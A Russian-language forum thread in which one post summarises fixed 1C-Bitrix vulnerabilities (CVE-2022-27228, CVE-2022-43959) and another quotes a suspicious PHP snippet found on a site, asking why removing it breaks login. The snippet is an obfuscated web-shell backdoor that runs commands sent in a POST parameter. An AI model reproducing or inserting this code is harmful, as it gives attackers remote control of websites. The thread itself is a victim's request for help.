Форум

https://nvd.nist.gov/vuln/detail/CVE-2022-27228
https://bdu.fstec.ru/vul/2022-01141
https://github.com/cr1f/writeups/blob/main/attacking_bitrix.pdf
https://safe-surf.ru/upload/ALRT/ALRT-20220712.1.pdf

Эта бала одна из критических уязвимостей за последнее время. Багу пофиксили уже давно, начиная с версии v21.0.100 от 2022-03-04. Историю изменений модуля vote можно посмотреть тут. Текущая версия v23.0.0.  Кроме того, тогда многие рекомендовали помимо обновления 1С Битрикс обновить PHP до 7.4. На самом деле, разработчики сейчас советуют обновить до 8.1, даже выпустили пошаговую инструкцию по обновлению версии PHP - https://helpdesk.bitrix24.ru/open/17332020/

В 2022 г была еще одна уязвимость CVE-2022-43959, но для её эксплуатации надо иметь сконфигурированное сопряжение с AD/LDAP и иметь административные права в 1С Битрикс. Но и эту проблему уже устранили в модуле ldap в версии v23.100.0 от 2023-02-19. Историю изменений можно посмотреть тут.

В целом, все изменения 1С Битрикс публикуются тут: https://dev.1c-bitrix.ru/docs/versions.php?lang=ru&module=ldap

Если смотреть текущие уязвимости, то свежих CVE пока на них нет, из чего можно сделать вывод, что пока все относительно тихо:
https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=Bitrix

Обновите свой 1С Битрикс.

define("BX_CONTROLLER_CLIENT_X", base64_decode("QlhfVE9LRU4="));
if(isset($_POST[BX_CONTROLLER_CLIENT_X]) && !empty($_POST[BX_CONTROLLER_CLIENT_X])){$APPLICATION->RestartBuffer();CControllerClient::RunCommand(hex2bin(str_rot13($_POST[BX_CONTROLLER_CLIENT_X])), 0, 0);die();}

После этого на сайт не получается авторизоваться, пишет в адресной строке https://сайт/auth/?login=yes и ничего не происходит, не выдает ошибок, все на том же окне авторизации. Если попытка войти в админку, то после "войти" черный экран фона админки и все

Если эти куски кода возвращаю - авторизация снова проходит в обычном режиме....куда еще нужно посмотреть? почему может быть такой эффект от удаления этого кода, которого изначально не было

жду помощи 🙏